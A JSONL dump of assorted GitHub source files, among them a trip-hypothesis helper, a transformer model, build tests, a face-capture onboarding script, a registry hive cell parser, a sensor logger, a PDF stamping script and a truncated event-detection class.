+{"seq_id":"35513549861","text":"import datetime\nfrom typing import List\nimport operator\nimport logging\nimport os\n\nfrom .post import Post\nfrom .trip_hypothesis import TripHyposesis\nfrom .geoutils import get_geo_distance\nfrom .utils import make_module_name\n\nmodule_logger = logging.getLogger(make_module_name(os.path.abspath(__file__)))\n\n\ndef find_countries_change(posts) -> List[TripHyposesis]:\n    \"\"\"\n    Find intervals with the same country \n    \"\"\"\n    trip_hypotheses = [TripHyposesis(posts[0])]\n    countries = [trip_hypotheses[0].country]\n    for post in posts[1:]:\n        if post.country != trip_hypotheses[-1].country:\n            countries.append(post.country)\n            trip_hypotheses.append(TripHyposesis(post))\n        else:\n            trip_hypotheses[-1].add_post(post)\n    module_logger.info('Find country sequence: {}'.format(countries))\n    return trip_hypotheses\n\n\ndef calc_hypotheses_gap(h_1: TripHyposesis, h_2: TripHyposesis):\n    \"\"\"\n    Calc gap in days between TripHypothesis objects\n    \"\"\"\n    time_delta = h_2.get_start() - h_1.get_end()\n    return time_delta.days\n\n\ndef unite_close_by_time_hypotheses(\n        trip_hypotheses: List[TripHyposesis],\n        max_days_gap_in_trip\n    ) -> 
List[TripHyposesis]:\n \"\"\"\n Unite hypothesis with same country that have between them small amout of days\n without geotags\n \"\"\"\n if len(trip_hypotheses) < 3:\n return trip_hypotheses\n new_trips = [trip_hypotheses[0]]\n i = 2\n last_added = 0\n while i < len(trip_hypotheses):\n if new_trips[-1].country != None and trip_hypotheses[i-1].country == None and \\\n new_trips[-1].country == trip_hypotheses[i].country and \\\n calc_hypotheses_gap(new_trips[-1], trip_hypotheses[i]) <= max_days_gap_in_trip:\n for post in trip_hypotheses[i-1].posts:\n post.country = new_trips[-1].country\n new_trips[-1].add_post(post)\n new_trips[-1].add_posts(trip_hypotheses[i].posts)\n last_added = i\n i += 2\n else:\n new_trips.append(trip_hypotheses[i-1])\n last_added = i-1\n i += 1\n while last_added != len(trip_hypotheses) - 1:\n last_added += 1\n new_trips.append(trip_hypotheses[last_added])\n countries = [trip.country for trip in new_trips]\n module_logger.info('New country sequence: {}'.format(countries))\n return new_trips\n\n\ndef split_trip_by_cities(\n trip: TripHyposesis\n ) -> List[TripHyposesis]:\n \"\"\"\n Split trip inside one country\n \"\"\"\n # Split by city\n new_trips = [TripHyposesis(trip.posts[0])]\n if len(trip.posts) == 1:\n return new_trips\n for post in trip.posts[1:]:\n if (new_trips[-1].city is None and post.city is None) or \\\n (new_trips[-1].city is not None and post.city is not None and \\\n new_trips[-1].city.name == post.city.name):\n new_trips[-1].add_post(post)\n else:\n new_trips.append(TripHyposesis(post))\n # Unite posts without geotags with the closest in timeline city\n # (assume that on edges of the interval inside one country we have posts with \n # information about city, because of a construction process)\n if len(new_trips) < 3:\n return new_trips\n new_trips_without_gaps = []\n for i, city_trip in enumerate(new_trips):\n if city_trip.city is None:\n for p, post in enumerate(city_trip.posts):\n if calc_hypotheses_gap(new_trips[i-1], city_trip) > \\\n calc_hypotheses_gap(city_trip, new_trips[i+1]):\n j = p\n while j < len(city_trip.posts):\n city_trip.posts[j].city = new_trips[i+1].city\n j += 1\n new_trips[i+1].add_posts_in_begin(city_trip.posts[p:])\n break\n else:\n post.city = new_trips[i-1].city\n new_trips_without_gaps[-1].add_post(post)\n else:\n new_trips_without_gaps.append(city_trip)\n return new_trips_without_gaps\n \n\ndef find_city_change(trip_hypotheses: List[TripHyposesis]) -> List[TripHyposesis]:\n \"\"\"\n Find change of cities\n \"\"\"\n new_trips = []\n for trip in trip_hypotheses:\n if trip.country == None:\n new_trips.append(trip)\n else:\n new_trips.extend(split_trip_by_cities(trip))\n return new_trips\n\n\ndef find_local_cities(\n trip_hypotheses: List[TripHyposesis],\n min_local_city_counter,\n max_local_cities_amount,\n max_satelite_towns_distance\n ) -> List[str]:\n \"\"\"\n Calculate locations stats and find local cities\n \"\"\"\n local_cities = []\n cities_counter = dict()\n cities_dict = dict()\n for trip in trip_hypotheses:\n if trip.city is None:\n continue\n if trip.city.name in cities_counter:\n cities_counter[trip.city.name] += 1\n else:\n cities_dict[trip.city.name] = trip.city\n cities_counter[trip.city.name] = 1\n cities_sorted = sorted(cities_counter.items(), key=operator.itemgetter(1), reverse=True)\n if cities_sorted[0][1] > 1:\n local_cities.append(cities_sorted[0][0])\n for city in cities_sorted[1:max_local_cities_amount]:\n if city[1] >= min_local_city_counter:\n local_cities.append(city[0])\n # Add satelite towns 
for local cities\n additional_local_cities = []\n for city in cities_dict:\n if city not in local_cities:\n for local_city in local_cities:\n if get_geo_distance(cities_dict[city], cities_dict[local_city]) \\\n < max_satelite_towns_distance:\n additional_local_cities.append(city)\n break\n local_cities.extend(additional_local_cities) \n return local_cities\n\n\ndef exclude_local_hypothesis(\n trip_hypotheses: List[TripHyposesis],\n local_cities: List[str]\n ) -> List[TripHyposesis]:\n \"\"\"\n Exclude local cities and hypotheses without location\n \"\"\"\n new_trips = []\n for trip in trip_hypotheses:\n if trip.country is not None and trip.city.name not in local_cities:\n new_trips.append(trip)\n return new_trips\n\n\ndef exclude_long_trips(\n trip_hypotheses: List[TripHyposesis],\n max_trip_length\n ) -> List[TripHyposesis]:\n \"\"\"\n Exclude or split very long trips\n \"\"\"\n new_trips = []\n for trip in trip_hypotheses:\n if trip.get_duration_in_days() <= max_trip_length:\n new_trips.append(trip)\n return new_trips\n\n\ndef unite_small_city_trips(\n trip_hypotheses: List[TripHyposesis], \n min_posts_in_trip_amount: int,\n max_days_gap_in_trip: int,\n max_cities_distance_in_trip: int\n ) -> List[TripHyposesis]:\n \"\"\"\n Unite small city trips in one big country trip\n \"\"\"\n new_trips = [trip_hypotheses[0]]\n if len(trip_hypotheses) == 1:\n return new_trips\n for trip in trip_hypotheses[1:]:\n if trip.country == new_trips[-1].country:\n days_gap = calc_hypotheses_gap(new_trips[-1], trip)\n geo_distance = get_geo_distance(new_trips[-1].posts[-1].city, trip.posts[0].city)\n if days_gap <= max_days_gap_in_trip and (len(trip.posts) <= min_posts_in_trip_amount or \\\n len(new_trips[-1].posts) <= min_posts_in_trip_amount): # and \\\n # geo_distance < max_cities_distance_in_trip:\n module_logger.info('Unite {} with {}'.format(\n new_trips[-1].posts[-1].city.name, \n trip.posts[-1].city.name\n )\n )\n new_trips[-1].add_posts(trip.posts)\n continue\n else:\n module_logger.info('Not unite {}, distance {}, days gap {}'.format(\n trip.posts[-1].city.name, \n geo_distance,\n days_gap\n )\n )\n new_trips.append(trip)\n return new_trips\n\n","repo_name":"mashaka/Inspiry","sub_path":"algo/compute_tools.py","file_name":"compute_tools.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16681365677","text":"from transformers import BertModel, BertConfig\nimport torch\nfrom torch import nn\n\n\nclass Transformer(nn.Module):\n def __init__(self, vocab_size=21128):\n super().__init__()\n encoder_config = BertConfig(\n num_hidden_layers=6,\n vocab_size=vocab_size,\n hidden_size=512,\n num_attention_heads=8,\n )\n self.encoder = BertModel(encoder_config)\n\n decoder_config = BertConfig(\n num_hidden_layers=6,\n vocab_size=vocab_size,\n hidden_size=512,\n num_attention_heads=8,\n )\n decoder_config.is_decoder = True\n decoder_config.add_cross_attention = True\n self.decoder = BertModel(decoder_config)\n\n self.linear = nn.Linear(512, vocab_size, bias=False)\n\n def forward(self, input_ids, mask_encoder_input, output_ids, mask_decoder_input):\n encoder_outputs = self.encoder(input_ids, mask_encoder_input)\n encoder_hidden_states = encoder_outputs[0]\n # out: [batch_size, max_length, hidden_size]\n outs = self.decoder(\n output_ids, mask_decoder_input, encoder_hidden_states=encoder_hidden_states\n )\n\n out = self.linear(outs[0])\n return out\n\n def reload_from(self, path, resize_vocab_to=None, 
device=None):\n state_dict = torch.load(path, map_location=device)\n\n if resize_vocab_to:\n extra_size = (\n resize_vocab_to\n - state_dict[\"encoder.embeddings.word_embeddings.weight\"].shape[0]\n )\n decoder_emb = state_dict[\"decoder.embeddings.word_embeddings.weight\"]\n device = decoder_emb.device\n encdoer_emb = state_dict[\"encoder.embeddings.word_embeddings.weight\"]\n state_dict[\"decoder.embeddings.word_embeddings.weight\"] = torch.cat(\n (\n decoder_emb,\n torch.rand(\n extra_size,\n decoder_emb.shape[1],\n dtype=torch.float32,\n device=device,\n ),\n ),\n dim=0,\n )\n extra_size = resize_vocab_to - encdoer_emb.shape[0]\n state_dict[\"encoder.embeddings.word_embeddings.weight\"] = torch.cat(\n (\n encdoer_emb,\n torch.rand(\n extra_size,\n encdoer_emb.shape[1],\n dtype=torch.float32,\n device=device,\n ),\n ),\n dim=0,\n )\n extra_size = resize_vocab_to - state_dict[\"linear.weight\"].shape[0]\n linear_layer = state_dict[\"linear.weight\"]\n state_dict[\"linear.weight\"] = torch.cat(\n (\n linear_layer,\n torch.rand(extra_size, 512, dtype=torch.float32, device=device),\n ),\n 0,\n )\n self.load_state_dict(state_dict, strict=False)\n","repo_name":"BigBinnie/D4_baseline","sub_path":"models/transformer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"24454386983","text":"import unittest, os, sys, tempfile\r\n\r\nfrom wudoo.FSItem import FSItem\r\nfrom wudoo.SystemWillExecutor import SystemWillExecutor\r\n\r\nfrom wudoo.compile.cpp.Front import DefaultCPPCompilation\r\nfrom wudoo.compile.BaseCompilation import BaseCompilation\r\nfrom wudoo.compile.cpp.CPPProject import CPPProject\r\nfrom wudoo.compile.cpp.gcc.GPPCompiler import GPPCompiler\r\nfrom wudoo.filter.ExtensionBasedFilter import ExtensionBasedFilter\r\n\r\nfrom tests.fakes.StoreCallsWillExecutor import StoreCallsWillExecutor\r\n\r\nclass TestEasyExamples(unittest.TestCase):\r\n\tsys.path.append(\r\n\t\tos.path.normpath(os.path.join(sys.path[0], \"..\", \"Examples\", \"Compile\", \"CPP\", \"UseExportHeaders\", \"CM\"))\t\t\t\t\t\r\n\t\t)\r\n\timport build_useexphdr as build_useexphdr_prj\r\n\t\r\n\tsys.path.append(\r\n\t\tos.path.normpath(os.path.join(sys.path[0], \"..\", \"Examples\", \"Compile\", \"CPP\", \"UseExportHeaders\", \"CM\", \"sub-missions\"))\t\t\t\t\t\r\n\t\t)\r\n\timport build_dependproxy_1 as build_dependproxy_prj\r\n\t\r\n\tdef testCompile(self):\r\n\t\tfrom tests.compile.TestCompilation import TestCompilation\r\n\t\tproject = TestCompilation.build_easy_prj.getProject()\r\n\t\tcompilation = BaseCompilation(project)\r\n#\t\tcompilation.setGoalFSItem(FSItem(\"C:\\Work\", \"hello.exe\"))\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n#\t\tstrat = AllocInSpecifDirStrategy(tmpDir, \".o\")\r\n#\t\tcompilation.setAllocateObjStrategy(strat)\r\n#\t\tcompilation.setCompiler(GPPCompiler())\r\n\t\twe = StoreCallsWillExecutor()\r\n\t\tfrom wudoo.compile.cpp.Front import setupPathsFromRoot, wdefaultBuild\r\n\t\tdef setupCompilationCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupCompilationCallback, we)\r\n#\t\tcompilation.compile(we)\r\n#\t\tcompilation.resolveDependings(we)\r\n#\t\tcompilation.buildBinary(we)\r\n\t\twe.history.sort()\r\n\t\tcmd = we.history[2]\r\n\t\tself.assertTrue(cmd.find(\"g++\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"-c\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Main.cpp\") > 
-1)\r\n\t\tself.assertTrue(cmd.find(\"-o\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Main.o\") > -1)\r\n\t\tcmd = we.history[0]\r\n\t\tself.assertTrue(cmd.find(\"g++\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Hello.o\") > -1)\r\n\t\tself.assertTrue(cmd.find(\"Main.o\") > -1)\r\n\t\t\r\n\tdef testEasyBuildReal(self):\r\n\t\tfrom tests.compile.TestCompilation import TestCompilation\r\n\t\tfrom wudoo.compile.cpp.Front import setupPathsFromRoot, wdefaultBuild\r\n\t\tproject = TestCompilation.build_easy_prj.getProject()\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n\t\tdef setupCompilationCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupCompilationCallback)\r\n\t\tproject = CPPProject(\"Prj\", tmpDir, tmpDir)\r\n\t\tproject.addSrcFolders(\"\\n\".join(os.listdir(tmpDir)))\r\n\t\tproject.setSourceFilter(ExtensionBasedFilter({\"o\": \"o\", \"exe\": \"exe\"}));\r\n\t\tproject.findSources()\r\n\t\tobjItems = project.getSourceItems()\r\n\t\tobjPaths = [io.getPathNameExt(1) for io in objItems]\r\n\t\tobjPaths.sort()\r\n\t\tself.assertEquals([\"Bin\\\\BuildEasy.exe\", \"Obj\\\\Src\\\\Hello.o\", \"Obj\\\\Src\\\\Main.o\"], objPaths)\r\n\t\t\r\n\tdef testBuildDepend(self):\r\n\t\tproject = TestEasyExamples.build_useexphdr_prj.getProject()\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n\t\tfrom wudoo.compile.cpp.Front import setupPathsFromRoot, wdefaultBuild\r\n\t\tdef setupCompilationCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupCompilationCallback)\r\n\t\tproject = CPPProject(\"PrjFindSources\", tmpDir, tmpDir)\r\n\t\tproject.addSrcFolders(\"\\n\".join(os.listdir(tmpDir)))\r\n\t\tproject.setSourceFilter(ExtensionBasedFilter({\"o\": \"o\", \"exe\": \"exe\"}));\r\n\t\tproject.findSources()\r\n\t\tobjItems = project.getSourceItems()\r\n\t\tobjPaths = [io.getPathNameExt(1) for io in objItems]\r\n\t\tobjPaths.sort()\r\n\t\tself.assertEquals(\r\n\t\t\t[\"Bin\\\\UseExportHdr.exe\", \"Obj\\\\Src\\\\main.o\", \"Outer\\\\ExportHdr\\\\SrcMain\\\\main.o\", \"Outer\\\\ExportHdr\\\\Src\\\\ExportHello.o\"],\r\n\t\t\tobjPaths\r\n\t\t\t)\r\n\r\n\tdef testProxyStatlibEquilibristic(self):\r\n\t\tproject = TestEasyExamples.build_dependproxy_prj.getProject()\r\n\t\tproject.findSources()\r\n\t\ttmpDir = tempfile.mkdtemp()\r\n\t\tfrom wudoo.compile.cpp.Front import wdefaultBuild, setupPathsFromRoot \r\n\t\tdef setupTmpdirCallback(compilation, project):\r\n\t\t\tsetupPathsFromRoot(compilation, project, tmpDir)\r\n\t\twdefaultBuild(project, setupTmpdirCallback)\r\n\t\r\n\t\tproject = CPPProject(\"Prj\", tmpDir, tmpDir)\r\n\t\tproject.addSrcFolders(\"\\n\".join(os.listdir(tmpDir)))\r\n\t\tproject.setSourceFilter(ExtensionBasedFilter({\"o\": \"o\", \"exe\": \"exe\"}));\r\n\t\tproject.findSources()\r\n\t\tobjItems = project.getSourceItems()\r\n\t\tobjPaths = [io.getPathNameExt(1) for io in objItems]\r\n\t\tobjPaths.sort()\r\n\t\tself.assertEquals([\"Bin\\\\UseExportHdr-dependProxy.exe\", \"Obj\\\\CM\\\\sub-missions\\\\sub-src\\\\proxy\\\\main.o\", \"Outer\\\\ExportHdr\\\\SrcMain\\\\main.o\", \"Outer\\\\ExportHdr\\\\Src\\\\ExportHello.o\", \"Outer\\\\SLib-UseExportHdr\\\\CM\\\\sub-missions\\\\sub-src\\\\slib\\\\foo.o\", \"Outer\\\\SLib-UseExportHdr\\\\Src\\\\main.o\"], 
\r\n\t\t\tobjPaths\r\n\t\t\t)\r\n\r\n","repo_name":"XueHL/wudoo","sub_path":"Tests/tests/compile/examples/TestEasyExamples.py","file_name":"TestEasyExamples.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32131485406","text":"#import necessary libraries \r\nimport numpy as np\r\nimport mediapipe as mp\r\nfrom cvzone.FaceMeshModule import FaceMeshDetector\r\nimport cv2\r\nimport os\r\n\r\n#Initialize 'name' to trigger only when a new person is identified.\r\n#create a data base or folder in the employee name or ID is initialised in specified location.\r\n#employee name or ID, path to store image is managed through backend to frontend api\r\nname=input('Enter employee name: ')\r\npath= \"C:\\\\Users\\\\Mypc\\\\Desktop\\\\temp\\\\\"\r\nos.chdir(path)\r\nos.makedirs(name)\r\n\r\n#Webcam initialized with LED indication.\r\ncam=cv2.VideoCapture(0)\r\ncv2.namedWindow('output',cv2.WINDOW_NORMAL)\r\ncv2.resizeWindow('output',500,300)\r\n\r\ndetector = FaceMeshDetector(maxFaces=1)\r\nmp_drawings=mp.solutions.drawing_utils\r\nmp_holistic=mp.solutions.holistic\r\n\r\n\r\n#ImageCount statrs with initial count 'zero'\r\nimg_counter=0\r\ncase=img_counter\r\ndegree_sign = u\"\\N{DEGREE SIGN}\"\r\ndef switchcase(case):\r\n switch={0:\"Look Straight\",\r\n 1:\"Turn Face Left\",\r\n 2:\"Turn Face Right\",\r\n 3:\"Turn 45\"+degree_sign+\"right\",\r\n 4:\"Turn 45\"+degree_sign+\"left\",\r\n 5:\"Move a step back\",\r\n 6:\"Move a step forward\",\r\n 7:\"capture face smiling\",\r\n 8:\"capture with mask\",\r\n 9:\"Turn Left with mask\",\r\n }\r\n return switch.get(case)\r\n \r\n\r\n#define percentage of detection confidence through mediapipe required.\r\nwith mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\r\n while True:\r\n ret, frame = cam.read()\r\n roi = frame[180:375,200:400]\r\n \r\n if not ret:\r\n print(\"failed to grab frame\")\r\n break\r\n \r\n results = holistic.process(frame)\r\n #frame, faces = detector.findFaceMesh(frame) \r\n overlay=frame.copy()\r\n output=frame.copy()\r\n cv2.rectangle(overlay, (200,180), (400,375),(255,0,0), 4)\r\n \r\n if results.face_landmarks:\r\n mp_drawings.draw_landmarks(overlay,results.face_landmarks,mp_holistic.FACE_CONNECTIONS,\r\n mp_drawings.DrawingSpec(color=(110,150,10),thickness=2,circle_radius=2),\r\n mp_drawings.DrawingSpec(color=(256,80,121),thickness=2,circle_radius=2)\r\n )\r\n mp_drawings.draw_landmarks(overlay,results.pose_landmarks,mp_holistic.POSE_CONNECTIONS,\r\n mp_drawings.DrawingSpec(color=(245,117,66),thickness=2,circle_radius=4),\r\n mp_drawings.DrawingSpec(color=(245,66,230),thickness=2,circle_radius=2)\r\n )\r\n else:\r\n print(\"Find Face\")\r\n cv2.putText(overlay,switchcase(img_counter),(130,450),cv2.FONT_HERSHEY_SIMPLEX, 2,(0,0,255),3)\r\n alpha=0.2\r\n cv2.addWeighted(overlay,alpha,output,1-alpha,0,output) \r\n cv2.imshow('output',output)\r\n \r\n k = cv2.waitKey(1)\r\n if k%256 == 27:\r\n # ESC pressed\r\n print(\"Escape hit, closing...\")\r\n break\r\n elif k%256 == 32:\r\n # SPACE pressed\r\n img_name =\"C:\\\\Users\\\\Mypc\\\\Desktop\\\\temp\\\\\"+ name +\"/image_{}.jpg\".format(img_counter)\r\n cv2.imwrite(img_name,roi)\r\n print(\"{} written!\".format(img_name))\r\n img_counter += 1\r\n if img_counter==10:\r\n 
break\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"DileepChakravarthy7/Head_shots","sub_path":"Onboard_process.py","file_name":"Onboard_process.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18214915752","text":"class Solution:\n def maximumScore(self, nums: List[int], multipliers: List[int]) -> int:\n @functools.lru_cache(2000)\n def dp(s: int, i: int) -> int:\n if i == len(multipliers):\n return 0\n\n e = len(nums) - (i - s) - 1\n pickStart = nums[s] * multipliers[i] + dp(s + 1, i + 1)\n pickEnd = nums[e] * multipliers[i] + dp(s, i + 1)\n return max(pickStart, pickEnd)\n\n return dp(0, 0)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1770. Maximum Score from Performing Multiplication Operations/1770.py","file_name":"1770.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"32406720828","text":"from aiowinreg.filestruct.keytypes import NTRegistryKeyTypes\n\nclass NTRegistryCell:\n\tdef __init__(self):\n\t\tself.size = None\n\t\tself.data = None\n\t\n\t@staticmethod\n\tdef load_data_from_offset(reader, offset, is_file = True):\n\t\t\"\"\"\n\t\tReturns a HBIN block from the data in the reader at offset\n\t\t\"\"\"\n\t\tif is_file is True:\n\t\t\treader.seek(4096+offset,0)\n\t\telse:\n\t\t\treader.seek(offset,0)\n\t\tcell = NTRegistryCell.read(reader)\n\t\treturn cell.data\n\n\t@staticmethod\n\tasync def aload_data_from_offset(reader, offset, is_file = True):\n\t\t\"\"\"\n\t\tAsync\n\t\tReturns a HBIN block from the data in the reader at offset\n\t\t\"\"\"\n\t\tif is_file is True:\n\t\t\tawait reader.seek(4096+offset,0)\n\t\telse:\n\t\t\tawait reader.seek(offset,0)\n\t\tcell = await NTRegistryCell.aread(reader)\n\t\treturn cell.data\n\n\t@staticmethod\n\tasync def aread(reader):\n\t\tcell = NTRegistryCell()\n\t\tt = await reader.read(4)\n\t\tif t == b'hbin':\n\t\t\tcell.size = 0\n\t\t\treturn cell\n\n\t\tcell.size = int.from_bytes(t, 'little', signed = True)\n\t\tcell.size = cell.size * -1\n\t\t\n\t\tif cell.size == 0:\n\t\t\treturn cell\n\t\telif cell.size > 0:\n\t\t\tcell.data = await reader.read(cell.size - 4)\n\t\t\tif cell.data[:2] in NTRegistryKeyTypes:\n\t\t\t\tcell.data = NTRegistryKeyTypes[cell.data[:2]].from_bytes(cell.data)\n\t\t\t\n\t\telse:\n\t\t\tcell.data = await reader.read( (-1)*cell.size - 4)\n\n\t\treturn cell\n\n\t@staticmethod\n\tdef read(reader):\n\t\tcell = NTRegistryCell()\n\t\tt = reader.read(4)\n\t\tif t == b'hbin':\n\t\t\tcell.size = 0\n\t\t\treturn cell\n\t\tcell.size = int.from_bytes(t, 'little', signed = True)\n\t\tcell.size = cell.size * -1\n\t\tif cell.size == 0:\n\t\t\treturn cell\n\t\telif cell.size > 0:\n\t\t\tcell.data = reader.read(cell.size - 4)\n\t\t\tif cell.data[:2] in NTRegistryKeyTypes:\n\t\t\t\tcell.data = NTRegistryKeyTypes[cell.data[:2]].from_bytes(cell.data)\n\t\t\t\n\t\telse:\n\t\t\tcell.data = reader.read( (-1)*cell.size - 4)\n\n\t\treturn cell\n\n\tdef __str__(self):\n\t\tt = '== NT Registry Cell struct ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tt += '%s: %s \\r\\n' % (k, self.__dict__[k])\n\t\treturn t\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/aiowinreg/filestruct/regcell.py","file_name":"regcell.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} 
+{"seq_id":"43231469129","text":"import PyPDF4\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.pdfgen import canvas\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\n# Generate an RSA private key\nprivate_key = rsa.generate_private_key(\n    public_exponent=65537,\n    key_size=2048\n)\n\n# Get the corresponding public key\npublic_key = private_key.public_key()\n\n# Create a blank PDF file for the digital signature\nfirma_pdf = canvas.Canvas(\"firma.pdf\", pagesize=letter)\nfirma_pdf.setFont(\"Helvetica\", 8)  # Change the font size to 8\n\n# Draw the stamp with your name in the PDF file\nfirma_pdf.drawString(10, 10, \"Arquitecto de software Cenabast\")  # Change the position of the stamp\nfirma_pdf.drawString(10, 25, \"Firmado por: Sergio Navarro M.\")  # Change the position of the stamp\n\n# Save the PDF file with the stamp\nfirma_pdf.save()\n\n# Open the PDF file to be signed\nwith open('ejemplo.pdf', 'rb') as file:\n    pdf = PyPDF4.PdfFileReader(file)\n    num_pages = pdf.getNumPages()\n\n    # Add the stamp on every page of the PDF file\n    writer = PyPDF4.PdfFileWriter()\n\n    for page_num in range(num_pages):\n        page = pdf.getPage(page_num)\n\n        # Add the stamp as a stamp-style annotation\n        x = 10  # Change the x coordinate to a smaller value\n        y = 10  # Change the y coordinate to a smaller value\n        width = 200\n        height = 50\n        stamp = PyPDF4.PdfFileReader(\"firma.pdf\").getPage(0)\n        page.mergeTranslatedPage(stamp, x, y, expand=True)\n\n        # Add the signed page to the PdfFileWriter object\n        writer.addPage(page)\n\n    # Save the signed PDF file\n    with open('ejemplo_firmado.pdf', 'wb') as output_file:\n        writer.write(output_file)","repo_name":"SnavarroM/firma_digital","sub_path":"firma_3.py","file_name":"firma_3.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11738458219","text":"import time\nimport multiprocessing\n\nfrom .InterfaceResource import InterfaceResource\nfrom . import logger\n\nsensor_logger = logger.EventLogger(name=__name__)\n\n\nclass TaskCentre:\n    def __init__(self, sensor_dict: dict):\n        self.log = sensor_logger\n        self.end_at = None\n        sensor_list = list(sensor_dict.values())\n        self.queue = []\n        for sensor in sensor_list:\n            self.log.write(\"info\", \"Found sensor: {}\".format(sensor.name))\n            if self.queue:\n                if sensor.connection.type == InterfaceResource.EXE:\n                    self.queue.append({sensor.name: sensor})\n                else:\n                    for self.queue_dict in self.queue:\n                        ombre = self.queue_dict\n                        (nome, oggetto) = ombre.popitem()\n                        if oggetto.connection.type != sensor.connection.type:\n                            self.queue.append({sensor.name: sensor})\n                        else:\n                            oggetto_config = getattr(oggetto.connection, oggetto.connection.config)\n                            sensor_config = getattr(sensor.connection, sensor.connection.config)\n                            if oggetto_config != sensor_config:\n                                self.queue.append({sensor.name: sensor})\n                            else:\n                                self.queue_dict[sensor.name] = sensor\n            else:\n                self.queue.append({sensor.name: sensor})\n\n    def set_end_time(self, end_time):\n        if isinstance(end_time, str):  # Input is time in string\n            self.end_at = time.mktime(time.strptime(end_time, \"%Y-%m-%d %H:%M:%S\"))\n        elif isinstance(end_time, int) or isinstance(end_time, float):  # Input is duration\n            # in seconds\n            self.end_at = time.time() + end_time\n        else:\n            raise TypeError(\"Failed to set period for logger. 
Please check the format again.\")\n\n def start(self, csv_log_object, period: float):\n runner = MeasurementExec(self.queue)\n # In case there are still some initialisation steps defined under init function\n runner.init_sensors()\n\n # list of sensor name with default sequence\n list_sensor = []\n for entries in self.queue:\n for entry in entries:\n list_sensor.append(entry)\n if \"Time\" in list_sensor:\n tmp_list = [list_sensor.pop(list_sensor.index(\"Time\"))]\n for element in list_sensor:\n tmp_list.append(element)\n list_sensor = tmp_list\n\n csv_log_object.register(list_sensor) # write heading to CSV\n\n while True:\n next_logging_time = time.time() + period\n readings = runner.run()\n print(\"\") # print new line\n csv_log_object.write(readings)\n if self.end_at:\n if self.end_at < time.time():\n break # Exit loop once reached end time\n while next_logging_time > time.time():\n time.sleep(0.001) # sleep for 1 millisecond\n\n\nclass MeasurementExec:\n def __init__(self, sensor_queue=None):\n self.result = dict()\n self.sensor_queue = []\n if sensor_queue:\n self.add_sensors(sensor_queue)\n\n def add_sensors(self, sensor_queue: list):\n self.sensor_queue = sensor_queue\n\n def get_sensors(self):\n return self.sensor_queue\n\n def init_sensors(self):\n for x in self.sensor_queue:\n for y in x:\n if hasattr(x[y], \"init\"):\n x[y].init()\n\n def thread(self, sensor_dict: dict):\n result_dict = dict()\n for each in sensor_dict:\n result = sensor_dict[each].read()\n print(\"{}: {}\".format(each, result))\n result_dict[each] = result\n return result_dict\n\n def run(self):\n self.result = dict()\n pool = multiprocessing.Pool(len(self.sensor_queue))\n dict_result = pool.map(self.thread, self.sensor_queue)\n for element in dict_result:\n self.result.update(element)\n return self.result\n","repo_name":"bernardkkt/loguiado","sub_path":"lib/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34307692721","text":"#!/usr/bin/python3\n\n\"\"\"\n##############\nEventDetective\n##############\nDetecteert events gegeven dataset\n\"\"\"\n\nimport os, sys, json, pickle\nfrom collections import defaultdict, Counter\nimport nltk\nfrom math import log, log2\nfrom sklearn.naive_bayes import MultinomialNB\nfrom nltk.classify.scikitlearn import SklearnClassifier\nimport random\nfrom modules import tabulate\nfrom FeatureSelector import FeatureSelector\nfrom operator import itemgetter\n\nclass EventDetective:\n\n def __init__(self):\n self.dataSets = os.listdir('data/')\n self.candidates = {}\n self._loadDataSet()\n featureSelector = FeatureSelector(self.candidates)\n #self.featuresCat = []\n #self.featuresBi = []\n self.events = []\n \n # detecteer events\n for h in self.candidates:\n for t in self.candidates[h]:\n candidate = self.candidates[h][t] \n \n featuresCat = featureSelector.getFeatures(candidate, ['wordFeatures'])\n featureSelector.addCategoryClassifier(self.classifierCat)\n label = self.classifierCat.classify(featuresCat)\n\n featuresBi = featureSelector.getFeatures(candidate,['category', 'location','wordOverlapSimple','wordOverlapUser'])\n classifierBiLabel = self.classifierBi.classify(featuresBi)\n if classifierBiLabel != \"geen_event\":\n self.events.append((candidate,classifierBiLabel)) \n \n def _loadDataSet(self):\n for i, dataset in enumerate(self.dataSets):\n print(\"{}: {}\".format(i, dataset))\n choice = int(input(\"Select a dataset with 
